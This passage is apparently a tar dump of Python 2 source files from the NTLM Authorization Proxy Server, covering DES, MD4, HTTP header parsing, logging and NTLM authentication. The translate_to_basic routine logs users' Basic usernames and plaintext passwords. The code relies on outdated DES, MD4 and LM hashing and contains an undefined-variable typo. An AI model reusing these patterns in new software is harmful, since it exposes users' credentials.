[ U32(0x00000000L),U32(0x04000000L),U32(0x00040000L),U32(0x04040000L), U32(0x00000002L),U32(0x04000002L),U32(0x00040002L),U32(0x04040002L), U32(0x00002000L),U32(0x04002000L),U32(0x00042000L),U32(0x04042000L), U32(0x00002002L),U32(0x04002002L),U32(0x00042002L),U32(0x04042002L), U32(0x00000020L),U32(0x04000020L),U32(0x00040020L),U32(0x04040020L), U32(0x00000022L),U32(0x04000022L),U32(0x00040022L),U32(0x04040022L), U32(0x00002020L),U32(0x04002020L),U32(0x00042020L),U32(0x04042020L), U32(0x00002022L),U32(0x04002022L),U32(0x00042022L),U32(0x04042022L), U32(0x00000800L),U32(0x04000800L),U32(0x00040800L),U32(0x04040800L), U32(0x00000802L),U32(0x04000802L),U32(0x00040802L),U32(0x04040802L), U32(0x00002800L),U32(0x04002800L),U32(0x00042800L),U32(0x04042800L), U32(0x00002802L),U32(0x04002802L),U32(0x00042802L),U32(0x04042802L), U32(0x00000820L),U32(0x04000820L),U32(0x00040820L),U32(0x04040820L), U32(0x00000822L),U32(0x04000822L),U32(0x00040822L),U32(0x04040822L), U32(0x00002820L),U32(0x04002820L),U32(0x00042820L),U32(0x04042820L), U32(0x00002822L),U32(0x04002822L),U32(0x00042822L),U32(0x04042822L), ] ]spkproxy/ntlm/des.py0100664000076500007650000000614007562544371013527 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import des_c, ntlmutils #--------------------------------------------------------------------- class DES: des_c_obj = None #----------------------------------------------------------------- def __init__(self, key_str): "" k = str_to_key56(key_str) k = key56_to_key64(k) key_str = ntlmutils.lst2str(k) self.des_c_obj = des_c.DES(key_str) #----------------------------------------------------------------- def encrypt(self, plain_text): "" return self.des_c_obj.encrypt(plain_text) #----------------------------------------------------------------- def decrypt(self, crypted_text): "" return self.des_c_obj.decrypt(crypted_text) #--------------------------------------------------------------------- #Some Helpers #--------------------------------------------------------------------- DESException = 'DESException' #--------------------------------------------------------------------- def str_to_key56(key_str): "" if type(key_str) != type(''): #rise DESException, 'ERROR. Wrong key type.' pass if len(key_str) < 7: key_str = key_str + '\000\000\000\000\000\000\000'[:(7 - len(key_str))] key_56 = [] for i in key_str[:7]: key_56.append(ord(i)) return key_56 #--------------------------------------------------------------------- def key56_to_key64(key_56): "" key = [] for i in range(8): key.append(0) key[0] = key_56[0]; key[1] = ((key_56[0] << 7) & 0xFF) | (key_56[1] >> 1); key[2] = ((key_56[1] << 6) & 0xFF) | (key_56[2] >> 2); key[3] = ((key_56[2] << 5) & 0xFF) | (key_56[3] >> 3); key[4] = ((key_56[3] << 4) & 0xFF) | (key_56[4] >> 4); key[5] = ((key_56[4] << 3) & 0xFF) | (key_56[5] >> 5); key[6] = ((key_56[5] << 2) & 0xFF) | (key_56[6] >> 6); key[7] = (key_56[6] << 1) & 0xFF; key = set_key_odd_parity(key) return key #--------------------------------------------------------------------- def set_key_odd_parity(key): "" for i in range(len(key)): for k in range(7): bit = 0 t = key[i] >> k bit = (t ^ bit) & 0x1 key[i] = (key[i] & 0xFE) | bit return key spkproxy/ntlm/http_header.py0100664000076500007650000002621607562540467015253 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string, urlparse http_debug_file_name = 'http.debug' #----------------------------------------------------------------------- # tests client's header for correctness def test_client_http_header(header_str): "" request = string.split(header_str, '\012')[0] parts = string.split(request) # we have to have at least 3 words in the request # poor check if len(parts) < 3: return 0 else: return 1 #----------------------------------------------------------------------- # tests server's response header for correctness def test_server_http_header(header_str): "" response = string.split(header_str, '\012')[0] parts = string.split(response) # we have to have at least 2 words in the response # poor check if len(parts) < 2: return 0 else: return 1 #----------------------------------------------------------------------- def extract_http_header_str(buffer): "" # let's remove possible leading newlines t = string.lstrip(buffer) # searching for the RFC header's end delimiter = '\015\012\015\012' header_end = string.find(t, delimiter) if header_end < 0: # may be it is defective header made by junkbuster delimiter = '\012\012' header_end = string.find(t, delimiter) if header_end >=0: # we have found it, possibly ld = len(delimiter) header_str = t[0:header_end + ld] # Let's check if it is a proper header if test_server_http_header(header_str) or test_client_http_header(header_str): # if yes then let's do our work if (header_end + ld) >= len(t): rest_str = '' else: rest_str = t[header_end + ld:] else: # if not then let's leave the buffer as it is # NOTE: if there is some junk before right header we will never # find that header. Till timeout, I think. Not that good solution. header_str = '' rest_str = buffer else: # there is no complete header in the buffer header_str = '' rest_str = buffer return (header_str, rest_str) #----------------------------------------------------------------------- def extract_server_header(buffer): "" header_str, rest_str = extract_http_header_str(buffer) if header_str: header_obj = HTTP_SERVER_HEAD(header_str) else: header_obj = None return (header_obj, rest_str) #----------------------------------------------------------------------- def extract_client_header(buffer): "" header_str, rest_str = extract_http_header_str(buffer) if header_str: header_obj = HTTP_CLIENT_HEAD(header_str) else: header_obj = None return (header_obj, rest_str) #----------------------------------------------------------------------- def capitalize_value_name(str): "" tl = string.split(str, '-') for i in range(len(tl)): tl[i] = string.capitalize(tl[i]) return string.join(tl, '-') #----------------------------------------------------------------------- # some helper classes #----------------------------------------------------------------------- class HTTP_HEAD: "" pass #------------------------------- def __init__(self, head_str): "" self.head_source = '' self.params = None self.fields = None self.order_list = [] self.head_source = head_str head_str = string.strip(head_str) records = string.split(head_str, '\012') # Dealing with response line #fields = string.split(records[0], ' ', 2) t = string.split(string.strip(records[0])) fields = t[:2] + [string.join(t[2:])] self.fields = [] for i in fields: self.fields.append(string.strip(i)) # Dealing with params params = {} order_list = [] for i in records[1:]: parts = string.split(string.strip(i), ':', 1) pname = string.lower(string.strip(parts[0])) if not params.has_key(pname): params[pname] = [] order_list.append(string.lower(pname)) try: params[pname].append(string.strip(parts[1])) except: msg = "ERROR: Exception in head parsing. ValueName: '%s'" % pname #print msg self.debug(msg) self.params = params self.order_list = order_list #------------------------------- def debug(self, message): "" f = open(http_debug_file_name ,'a') f.write(message) f.write('\n=====\n') f.write(self.head_source) f.close() #------------------------------- def copy(self): "" import copy return copy.deepcopy(self) #------------------------------- def get_param_values(self, param_name): "" param_name = string.lower(param_name) if self.params.has_key(param_name): return self.params[param_name] else: return [] #------------------------------- def del_param(self, param_name): "" param_name = string.lower(param_name) if self.params.has_key(param_name): del self.params[param_name] #------------------------------- def has_param(self, param_name): "" param_name = string.lower(param_name) return self.params.has_key(param_name) #------------------------------- def add_param_value(self, param_name, value): "" param_name = string.lower(param_name) if not self.params.has_key(param_name): self.params[param_name] = [] if param_name not in self.order_list: self.order_list.append(param_name) self.params[param_name].append(value) #------------------------------- def replace_param_value(self, param_name, value): "" self.del_param(param_name) self.add_param_value(param_name, value) #------------------------------- def __repr__(self, delimiter='\n'): "" res = '' cookies = '' res = string.join(self.fields, ' ') + '\n' for i in self.order_list: if self.params.has_key(i): if i == 'cookie': for k in self.params[i]: cookies = cookies + capitalize_value_name(i) + ': ' + k + '\n' else: for k in self.params[i]: res = res + capitalize_value_name(i) + ': ' + k + '\n' res = res + cookies res = res + '\n' return res #------------------------------- def send(self, socket): "" #""" res = '' cookies = '' res = string.join(self.fields, ' ') + '\015\012' for i in self.order_list: if self.params.has_key(i): if i == 'cookie': for k in self.params[i]: cookies = cookies + capitalize_value_name(i) + ': ' + k + '\015\012' else: for k in self.params[i]: res = res + capitalize_value_name(i) + ': ' + k + '\015\012' res = res + cookies res = res + '\015\012' #""" #res = self.__repr__('\015\012') # NOTE!!! 0.9.1 worked, 0.9.5 and 0.9.7 did not with MSN Messenger. # We had problem here that prevent MSN Messenger from working. # Some work is needed to make __rerp__ working instead of current code.. try: #socket.send(self.head_source) socket.send(res) # self.debug(res) return 1 except: return 0 #----------------------------------------------------------------------- class HTTP_SERVER_HEAD(HTTP_HEAD): #------------------------------- def get_http_version(self): "" return self.fields[0] #------------------------------- def get_http_code(self): "" return self.fields[1] #------------------------------- def get_http_message(self): "" return self.fields[2] #----------------------------------------------------------------------- class HTTP_CLIENT_HEAD(HTTP_HEAD): #------------------------------- def get_http_version(self): "" return self.fields[2] #------------------------------- def get_http_method(self): "" return self.fields[0] #------------------------------- def get_http_url(self): "" return self.fields[1] #------------------------------- def set_http_url(self, new_url): "" self.fields[1] = new_url #------------------------------- # There is some problem with www request header... # not all servers want to answer to requests with full url in request # but want have net location in 'Host' value and path in url. def make_right_header(self): "" url_tuple = urlparse.urlparse(self.get_http_url()) net_location = url_tuple[1] self.replace_param_value('Host', net_location) path = urlparse.urlunparse(tuple(['', ''] + list(url_tuple[2:]))) self.set_http_url(path) #------------------------------- def get_http_server(self): "" # trying to get host from url url_tuple = urlparse.urlparse(self.get_http_url()) net_location = url_tuple[1] # if there was no host in url then get it from 'Host' value if not net_location: net_location = self.get_param_values('Host')[0] if not net_location: net_location = 'localhost' # trying to parse user:passwd@www.some.domain:8080 # is it needed? if '@' in net_location: cred, net_location = string.split(net_location, '@') if ':' in net_location: server, port = string.split(net_location, ':') port = int(port) else: server = net_location port = 80 return server, port spkproxy/ntlm/logger.py0100664000076500007650000000322107562540467014232 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import time #----------------------------------------------------------------------- class Logger: "provides facility for loggin messages during runtime" #----------------------------------------------------------------------- def __init__(self, log_name, debug_level = 1): "logger init routine" self.log_name = log_name self.debug_level = debug_level #----------------------------------------------------------------------- def log(self, str): "writes string to log file" if self.debug_level: tstr = '' # tstr = '(' + time.strftime('%H:%M:%S', time.localtime(time.time())) + ') ' # time.clock() fptr = open(self.log_name, 'a') fptr.write(tstr + str) fptr.close() spkproxy/ntlm/md4.py0100664000076500007650000002154607562540467013451 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # # MD4 validation data md4_test= [ ('', 0x31d6cfe0d16ae931b73c59d7e0c089c0L), ("a", 0xbde52cb31de33e46245e05fbdbd6fb24L), ("abc", 0xa448017aaf21d8525fc10ae87aa6729dL), ("message digest", 0xd9130a8164549fe818874806e1c7014bL), ("abcdefghijklmnopqrstuvwxyz", 0xd79e1c308aa5bbcdeea8ed63df412da9L), ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", 0x043f8582f241db351ce627e153e7f0e4L), ("12345678901234567890123456789012345678901234567890123456789012345678901234567890", 0xe33b4ddc9c38f2199c3e7b164fcc0536L), ] #------------------------------------------------------------------------------ from U32 import U32 class MD4: A = None B = None C = None D = None count, len1, len2 = None, None, None buf = [] #----------------------------------------------------- def __init__(self): self.A = U32(0x67452301L) self.B = U32(0xefcdab89L) self.C = U32(0x98badcfeL) self.D = U32(0x10325476L) self.count, self.len1, self.len2 = U32(0L), U32(0L), U32(0L) self.buf = [0x00] * 64 #----------------------------------------------------- def __repr__(self): r = 'A = %s, \nB = %s, \nC = %s, \nD = %s.\n' % (self.A.__repr__(), self.B.__repr__(), self.C.__repr__(), self.D.__repr__()) r = r + 'count = %s, \nlen1 = %s, \nlen2 = %s.\n' % (self.count.__repr__(), self.len1.__repr__(), self.len2.__repr__()) for i in range(4): for j in range(16): r = r + '%4s ' % hex(self.buf[i+j]) r = r + '\n' return r #----------------------------------------------------- def make_copy(self): dest = new() dest.len1 = self.len1 dest.len2 = self.len2 dest.A = self.A dest.B = self.B dest.C = self.C dest.D = self.D dest.count = self.count for i in range(self.count): dest.buf[i] = self.buf[i] return dest #----------------------------------------------------- def update(self, str): buf = [] for i in str: buf.append(ord(i)) ilen = U32(len(buf)) #print (ilen) # # , 8 if (long(self.len1 + (ilen << 3)) < long(self.len1)): self.len2 = self.len2 + U32(1) self.len1 = self.len1 + (ilen << 3) self.len2 = self.len2 + (ilen >> 29) # print int(self.len1), int(self.len2) #print (self.len1), (self.len2) L = U32(0) bufpos = 0 while (long(ilen) > 0): if (64 - long(self.count)) < long(ilen): L = U32(64 - long(self.count)) else: L = ilen for i in range(int(L)): self.buf[i + int(self.count)] = buf[i + bufpos] self.count = self.count + L ilen = ilen - L bufpos = bufpos + int(L) #print self.count, L, ilen if (long(self.count) == 64L): self.count = U32(0L) X = [] i = 0 for j in range(16): X.append(U32(self.buf[i]) + (U32(self.buf[i+1]) << 8) + \ (U32(self.buf[i+2]) << 16) + (U32(self.buf[i+3]) << 24)) i = i + 4 A = self.A B = self.B C = self.C D = self.D A = f1(A,B,C,D, 0, 3, X) D = f1(D,A,B,C, 1, 7, X) C = f1(C,D,A,B, 2,11, X) B = f1(B,C,D,A, 3,19, X) A = f1(A,B,C,D, 4, 3, X) D = f1(D,A,B,C, 5, 7, X) C = f1(C,D,A,B, 6,11, X) B = f1(B,C,D,A, 7,19, X) A = f1(A,B,C,D, 8, 3, X) D = f1(D,A,B,C, 9, 7, X) C = f1(C,D,A,B,10,11, X) B = f1(B,C,D,A,11,19, X) A = f1(A,B,C,D,12, 3, X) D = f1(D,A,B,C,13, 7, X) C = f1(C,D,A,B,14,11, X) B = f1(B,C,D,A,15,19, X) A = f2(A,B,C,D, 0, 3, X) D = f2(D,A,B,C, 4, 5, X) C = f2(C,D,A,B, 8, 9, X) B = f2(B,C,D,A,12,13, X) A = f2(A,B,C,D, 1, 3, X) D = f2(D,A,B,C, 5, 5, X) C = f2(C,D,A,B, 9, 9, X) B = f2(B,C,D,A,13,13, X) A = f2(A,B,C,D, 2, 3, X) D = f2(D,A,B,C, 6, 5, X) C = f2(C,D,A,B,10, 9, X) B = f2(B,C,D,A,14,13, X) A = f2(A,B,C,D, 3, 3, X) D = f2(D,A,B,C, 7, 5, X) C = f2(C,D,A,B,11, 9, X) B = f2(B,C,D,A,15,13, X) A = f3(A,B,C,D, 0, 3, X) D = f3(D,A,B,C, 8, 9, X) C = f3(C,D,A,B, 4,11, X) B = f3(B,C,D,A,12,15, X) A = f3(A,B,C,D, 2, 3, X) D = f3(D,A,B,C,10, 9, X) C = f3(C,D,A,B, 6,11, X) B = f3(B,C,D,A,14,15, X) A = f3(A,B,C,D, 1, 3, X) D = f3(D,A,B,C, 9, 9, X) C = f3(C,D,A,B, 5,11, X) B = f3(B,C,D,A,13,15, X) A = f3(A,B,C,D, 3, 3, X) D = f3(D,A,B,C,11, 9, X) C = f3(C,D,A,B, 7,11, X) B = f3(B,C,D,A,15,15, X) self.A = self.A + A self.B = self.B + B self.C = self.C + C self.D = self.D + D #print self #----------------------------------------------------- def digest(self): res = [0x00] * 16 s = [0x00] * 8 padding = [0x00] * 64 padding[0] = 0x80 padlen, oldlen1, oldlen2 = U32(0), U32(0), U32(0) temp = self.make_copy() oldlen1 = temp.len1 oldlen2 = temp.len2 if (56 <= long(self.count)): padlen = U32(56 - long(self.count) + 64) else: padlen = U32(56 - long(self.count)) #print int(padlen) temp.update(int_array2str(padding[:int(padlen)])) #print temp s[0]= (oldlen1) & U32(0xFF) s[1]=((oldlen1) >> 8) & U32(0xFF) s[2]=((oldlen1) >> 16) & U32(0xFF) s[3]=((oldlen1) >> 24) & U32(0xFF) s[4]= (oldlen2) & U32(0xFF) s[5]=((oldlen2) >> 8) & U32(0xFF) s[6]=((oldlen2) >> 16) & U32(0xFF) s[7]=((oldlen2) >> 24) & U32(0xFF) temp.update(int_array2str(s)) #print temp res[ 0]= temp.A & U32(0xFF) res[ 1]=(temp.A >> 8) & U32(0xFF) res[ 2]=(temp.A >> 16) & U32(0xFF) res[ 3]=(temp.A >> 24) & U32(0xFF) res[ 4]= temp.B & U32(0xFF) res[ 5]=(temp.B >> 8) & U32(0xFF) res[ 6]=(temp.B >> 16) & U32(0xFF) res[ 7]=(temp.B >> 24) & U32(0xFF) res[ 8]= temp.C & U32(0xFF) res[ 9]=(temp.C >> 8) & U32(0xFF) res[10]=(temp.C >> 16) & U32(0xFF) res[11]=(temp.C >> 24) & U32(0xFF) res[12]= temp.D & U32(0xFF) res[13]=(temp.D >> 8) & U32(0xFF) res[14]=(temp.D >> 16) & U32(0xFF) res[15]=(temp.D >> 24) & U32(0xFF) return int_array2str(res) #------------------------------------------------------------------------------ def F(x, y, z): return (((x) & (y)) | ((~x) & (z))) def G(x, y, z): return (((x) & (y)) | ((x) & (z)) | ((y) & (z))) def H(x, y, z): return ((x) ^ (y) ^ (z)) def ROL(x, n): return (((x) << n) | ((x) >> (32-n))) def f1(a, b, c, d, k, s, X): return ROL(a + F(b, c, d) + X[k], s) def f2(a, b, c, d, k, s, X): return ROL(a + G(b, c, d) + X[k] + U32(0x5a827999L), s) def f3(a, b, c, d, k, s, X): return ROL(a + H(b, c, d) + X[k] + U32(0x6ed9eba1L), s) def int_array2str(array): str = '' for i in array: str = str + chr(i) return str new = MD4 spkproxy/ntlm/ntlm_auth.py0100664000076500007650000004040607562540467014754 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string, select, base64 import ntlm_messages, utils, ntlm_procs class ntlm_auther: """ NTLM authenticator class. Makes an HTTP authentication using NTLM method. """ #----------------------------------------------------------------------- def __init__(self): "" pass #----------------------------------------------------------------------- def proxy_ntlm_authentication(self, connection): "" connection.logger.log('*** Authorization in progress...\n') connection.close_rserver() # build an environment env = self.build_env_dict(connection) if env['NTLM_TO_BASIC']: got_credentials = self.translate_to_basic(env, connection, '407') if not got_credentials: connection.logger.log("*** Passing modified server's response to clent.\n") connection.logger.log('*** End of firts stage of NTLM translation.\n') return connection.connect_rserver() NTLM_msg1 = ntlm_messages.create_message1(env) connection.logger_auth.log(ntlm_messages.debug_message1(NTLM_msg1)) tmp_client_head_obj = connection.client_head_obj.copy() tmp_client_head_obj.replace_param_value('Proxy-Connection', 'Keep-Alive') tmp_client_head_obj.replace_param_value('Proxy-Authorization', 'NTLM ' + NTLM_msg1) connection.reset_rserver() connection.rserver_buffer = '' connection.logger.log('*** Remote server buffer flushed.\n') # If we are POST/PUT-ing a large chunk of data we don't want # to do this at this time, so we change the data to 'abc' with # lenght = 3. if connection.client_head_obj.get_http_method() in ('POST', 'PUT'): tmp_client_head_obj.replace_param_value('Content-Length', '3') connection.logger.log('*** Fake NTLM header with Msg1:\n=====\n' + tmp_client_head_obj.__repr__()) connection.logger.log('*** Sending Fake NTLM header with Msg1...') tmp_client_head_obj.send(connection.rserver_socket) connection.logger.log('Done.\n') if connection.client_head_obj.get_http_method() in ('POST', 'PUT'): try: connection.logger.log("*** Sending fake 'abc' bytes body...") connection.rserver_socket.send('abc') connection.logger.log("Done.\n") except: # could not send data to remote server and have to end function connection.rserver_socket_closed = 1 connection.logger.log('Failed.\n*** Could not send client data to remote server. Exception in send().\n') return else: connection.logger.log("*** There must be no body to send.\n") connection.logger.log('*** Waiting for message 2 from remote server...\n') while((not connection.rserver_all_got) and (not connection.rserver_socket_closed)): select.select([connection.rserver_socket.fileno()], [], [], 2.0) connection.run_rserver_loop() if connection.config['DEBUG']['SCR_DEBUG']: print '\b+', if connection.rserver_head_obj: connection.logger.log('*** Got NTLM message 2 from remote server.\n') else: # could not get response with msg2 from remote server and have to end function connection.logger.log('*** Could not get response with msg2 from remote server.\n') connection.logger.log('*** Stop Request = %d.\n' % connection.stop_request) return auth = connection.rserver_head_obj.get_param_values('Proxy-Authenticate') if auth: msg2 = string.strip(string.split(auth[0])[1]) connection.logger_auth.log(ntlm_messages.debug_message2(msg2)) nonce = ntlm_messages.parse_message2(msg2) NTLM_msg3 = ntlm_messages.create_message3(nonce, env) connection.logger_auth.log(ntlm_messages.debug_message3(NTLM_msg3)) else: NTML_msg3 = '' tmp_client_head_obj = connection.client_head_obj.copy() tmp_client_head_obj.replace_param_value('Proxy-Authorization', 'NTLM ' + NTLM_msg3) connection.reset_rserver() connection.rserver_buffer = '' connection.logger.log('*** Remote server buffer flushed.\n') connection.logger.log('*** Sending Fake NTLM header (not body) with Msg3...') tmp_client_head_obj.send(connection.rserver_socket) connection.logger.log('Done.\n') connection.logger.log('*** Fake NTLM header with Msg3:\n=====\n' + tmp_client_head_obj.__repr__()) # upon exit all the remote server variables are reset # so new remote server response will be taken by the usual way in connection.run() connection.logger.log('*** End of NTLM authorization process.\n') #----------------------------------------------------------------------- def www_ntlm_authentication(self, connection): "" connection.logger.log('*** Authorization in progress...\n') connection.close_rserver() # build an environment env = self.build_env_dict(connection) if env['NTLM_TO_BASIC']: got_credentials = self.translate_to_basic(env, connection, '401') if not got_credentials: connection.logger.log("*** Passing modified server's response to clent.\n") connection.logger.log('*** End of firts stage of NTLM translation.\n') return connection.connect_rserver() NTLM_msg1 = ntlm_messages.create_message1(env) connection.logger_auth.log(ntlm_messages.debug_message1(NTLM_msg1)) tmp_client_head_obj = connection.client_head_obj.copy() tmp_client_head_obj.replace_param_value('Connection', 'Keep-Alive') #tmp_client_head_obj.replace_param_value('Authorization', 'Negotiate ' + NTLM_msg1) tmp_client_head_obj.replace_param_value('Authorization', 'NTLM ' + NTLM_msg1) connection.reset_rserver() connection.rserver_buffer = '' connection.logger.log('*** Remote server buffer flushed.\n') # If we are POST/PUT-ing a large chunk of data we don't want # to do this at this time, so we change the data to 'abc' with # lenght = 3. if connection.client_head_obj.get_http_method() in ('POST', 'PUT'): tmp_client_head_obj.replace_param_value('Content-Length', '3') connection.logger.log('*** Fake NTLM header with Msg1:\n=====\n' + tmp_client_head_obj.__repr__()) connection.logger.log('*** Sending Fake NTLM header (and body) with Msg1...') tmp_client_head_obj.send(connection.rserver_socket) if connection.client_head_obj.get_http_method() in ('POST', 'PUT'): try: connection.rserver_socket.send('abc') except: # could not send data to remote server and have to end function connection.rserver_socket_closed = 1 connection.logger.log('Failed.\n*** Could not send client data to remote server. Exception in send().\n') return connection.logger.log('Done.\n') connection.logger.log('*** Waiting for message 2 from the remote server...\n') while((not connection.rserver_all_got) and (not connection.rserver_socket_closed)): select.select([connection.rserver_socket.fileno()], [], [], 2.0) connection.run_rserver_loop() if connection.config['DEBUG']['SCR_DEBUG']: print '\b+', if connection.rserver_head_obj: connection.logger.log('*** Got NTLM message 2 from server.\n') # connection.logger.log('*** Remote server header with NTLM Msg2:\n=====\n' + connection.rserver_head_obj.__repr__()) else: # could not get response with msg2 from remote server and have to end function connection.logger.log('*** Could not get response with msg2 from server.\n') connection.logger.log('*** Stop Request = %d.\n' % connection.stop_request) return auth = connection.rserver_head_obj.get_param_values('Www-Authenticate') if auth: #connection.logger.log('### %s\n' % auth) msg2 = string.strip(string.split(auth[0])[1]) connection.logger_auth.log(ntlm_messages.debug_message2(msg2)) nonce = ntlm_messages.parse_message2(msg2) NTLM_msg3 = ntlm_messages.create_message3(nonce, env) connection.logger_auth.log(ntlm_messages.debug_message3(NTLM_msg3)) else: NTML_msg3 = '' tmp_client_head_obj = connection.client_head_obj.copy() #tmp_client_head_obj.replace_param_value('Authorization', 'Negotiate ' + NTLM_msg3) tmp_client_head_obj.replace_param_value('Authorization', 'NTLM ' + NTLM_msg3) connection.reset_rserver() connection.rserver_buffer = '' connection.logger.log('*** Remote server buffer flushed.\n') connection.logger.log('*** Sending Fake NTLM header (not body) with Msg3...') tmp_client_head_obj.send(connection.rserver_socket) connection.logger.log('Done.\n') connection.logger.log('*** Fake NTLM header with Msg3:\n=====\n' + tmp_client_head_obj.__repr__()) # upon exit all the remote server variables are reset # so new remote server response will be taken by the usual way in connection.run() connection.logger.log('*** End of NTLM authorization process.\n') #----------------------------------------------------------------------- def build_env_dict(self, connection): "" connection.logger.log('*** Building environment for NTLM.\n') env = {} if connection.config['NTLM_AUTH']['NTLM_FLAGS']: env['FLAGS'] = connection.config['NTLM_AUTH']['NTLM_FLAGS'] connection.logger.log('*** Using custom NTLM flags: %s\n' % env['FLAGS']) else: # I have seen flag field '\005\202' as well (with NT response). #0x8206 or 0x8207 or 0x8205 env['FLAGS'] = "06820000" #flags = utils.hex2str(ed['NTLM_FLAGS']) connection.logger.log('*** Using default NTLM flags: %s\n' % env['FLAGS']) env['LM'] = connection.config['NTLM_AUTH']['LM_PART'] env['NT'] = connection.config['NTLM_AUTH']['NT_PART'] # we must have at least LM part if not (env['LM'] or env['NT']): env['LM'] = 1 if env['LM'] == 1 and env['NT'] == 0: connection.logger.log('*** NTLM version with LM response only.\n') elif env['LM'] == 1 and env['NT'] == 1: connection.logger.log('*** NTLM version with LM and NT responses.\n') elif env['LM'] == 0 and env['NT'] == 1: connection.logger.log('*** NTLM version with NT response only.\n') #env['UNICODE'] = connection.config['NTLM_AUTH']['UNICODE'] if env['NT']: env['UNICODE'] = 1 else: env['UNICODE'] = 0 # have to put these ones into [NTLM] section env['DOMAIN'] = string.upper(connection.config['NTLM_AUTH']['NT_DOMAIN']) # Check if there is explicit NT_Hostname in config, if there is one then take it, # if there is no one then take gethostname() result. if connection.config['NTLM_AUTH']['NT_HOSTNAME']: env['HOST'] = string.upper(connection.config['NTLM_AUTH']['NT_HOSTNAME']) else: env['HOST'] = string.upper(connection.config['GENERAL']['HOST']) env['USER'] = string.upper(connection.config['NTLM_AUTH']['USER']) connection.logger.log('*** NTLM Domain/Host/User: %s/%s/%s\n' % (env['DOMAIN'], env['HOST'], env['USER'])) # have to use UNICODE stings if env['UNICODE']: env['DOMAIN'] = utils.str2unicode(env['DOMAIN']) env['HOST'] = utils.str2unicode(env['HOST']) env['USER'] = utils.str2unicode(env['USER']) connection.logger.log('*** Using UNICODE stings.\n') if connection.config['NTLM_AUTH']['LM_HASHED_PW'] and connection.config['NTLM_AUTH']['NT_HASHED_PW']: env['LM_HASHED_PW'] = connection.config['NTLM_AUTH']['LM_HASHED_PW'] env['NT_HASHED_PW'] = connection.config['NTLM_AUTH']['NT_HASHED_PW'] connection.logger.log('*** NTLM hashed passwords found.\n') # Test params if connection.config['NTLM_AUTH'].has_key('NTLM_MODE'): env['NTLM_MODE'] = int(connection.config['NTLM_AUTH']['NTLM_MODE']) else: env['NTLM_MODE'] = 0 # End of test params env['NTLM_TO_BASIC'] = int(connection.config['NTLM_AUTH']['NTLM_TO_BASIC']) connection.logger.log('*** Environment has been built successfully.\n') return env #----------------------------------------------------------------------- def translate_to_basic(self, environment, connection, error_code): "" connection.logger.log('*** Translating NTLM to Basic...\n') user, password = self.get_credentials_from_basic(connection, error_code) if user: connection.logger.log("*** Found Basic credentials in client's header.\n") environment['USER'] = user #environment['PASSWORD'] = password connection.logger.log("*** Basic User/Password: %s/%s.\n" % (user, password)) connection.logger.log("*** Calculating hashed passwords (LM and NT)...") environment['LM_HASHED_PW'] = ntlm_procs.create_LM_hashed_password(password) environment['NT_HASHED_PW'] = ntlm_procs.create_NT_hashed_password(password) connection.logger.log("Done.\n") return 1 else: connection.logger.log("*** There are no basic credentials in client's header.\n") connection.logger.log("*** Replacing NTLM value with Basic in rserver's header...") self.replace_ntlm_with_basic(connection, error_code) connection.logger.log("Done.\n") connection.logger.log("*** New server's header:\n=====\n" + connection.rserver_head_obj.__repr__()) return 0 #----------------------------------------------------------------------- def replace_ntlm_with_basic(self, connection, error_code): "" if error_code == '401': value_name = 'Www-Authenticate' else: value_name = 'Proxy-Authenticate' realm = connection.client_head_obj.get_http_server() basic_str = 'Basic realm="%s:%s"' % realm connection.rserver_head_obj.replace_param_value(value_name, basic_str) #----------------------------------------------------------------------- def get_credentials_from_basic(self, connection, error_code): "" if error_code == '401': value_name = 'Authorization' else: value_name = 